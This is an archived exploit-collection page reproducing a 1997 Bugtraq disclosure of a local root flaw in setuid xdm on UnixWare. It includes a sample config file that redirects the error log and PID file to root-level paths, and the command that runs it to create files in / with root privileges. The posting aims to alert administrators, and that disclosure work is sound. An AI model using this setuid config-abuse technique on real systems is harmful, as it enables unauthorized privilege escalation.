xdm UNIX Ware exploit
Summary |
---|
Description: | standard tempfile vulnerability in setuid root xdm on UNIX Ware systems with X, possibly others. |
Author: | Angel Ortiz <angelo@tawny.ssd.hcsc.com> |
Compromise: | root (local) |
Vulnerable Systems: | Systems with vulnerable xdm setuid (at least some UNIXware systems) |
Date: | 2 January 1997 |
Notes: | See addendum. |
Details |
---|
Exploit:
See addendum.Addendum:
Here is Angel Ortiz's original posting to Bugtraq:
Date: Thu, 2 Jan 1997 17:25:18 -0500 From: Angel OrtizTo: Multiple recipients of list BUGTRAQ Subject: XDM bug BUGTRAQRS: **************************DISCLAIMER AND WARNING*********************** The following information is provided as information to users in order to safeguard their systems. Users using this exploit are totally responsible for their actions ********************************************************************** I hope the following has not been documented in the past. If it has been, my humble apologies. Any way here is the problem. System: UNIX Ware systems with X Symptom: /usr/X/bin/xdm is setuid Exploit: If you do a man on xdm you will see that there is a command line option for a configuration file (-config). xdm [-config config_file] [-nodaemon] [-debug debug_level] [-error error_log_file] [-resources resource_file] [-server server_entry] By default, xdm uses the /usr/lib/xdm/xdm-config file. Out of curiosity, if you copy this file to your home directory you will be able to modify it and change where certain files are written to. For example, here is a sample xdm-config file which can reside in your home directory. ----------------------- Cut Here ------------------------------ #ident "@(#)xdm:config/xdm-conf.cpp 1.12.1.9" DisplayManager.companyLogoPixmap: /usr/X/lib/pixmaps/Nlogo.xpm DisplayManager.backgroundPixmap: /usr/X/lib/pixmaps/Npaper.xpm DisplayManager.showMnemonic: 1 DisplayManager.errorLogFile: /DANGEROUS-FILE DisplayManager.pidFile: /ALSO-DANGEROUS-FILE DisplayManager.keyFile: /usr/X/lib/xdm/xdm-keys DisplayManager.servers: /usr/X/lib/xdm/Xservers DisplayManager._0.authorize: true DisplayManager*authComplain: false DisplayManager._0.setup: /usr/X/lib/xdm/Xsetup_0 DisplayManager._0.terminateServer: true --------------------- Cut Here ------------------------------- Now, if you execute the following commands from a UNIX prompt: xdm -config dangerous-xdm-config-file You will create two files in the / directory. Guess what they are. Guess what can be done with such capabilities. Any way, please verify xdm setuid on your systems and please let the bugtraq news group know if it exists on other systems. Regards,
More Exploits! |
---|
The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's | Linux | Solaris/SunOS | Micro$oft |
*BSD | Macintosh | AIX | IRIX |
ULTRIX/Digital UNIX | HP/UX | SCO | Remote exploits |
This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: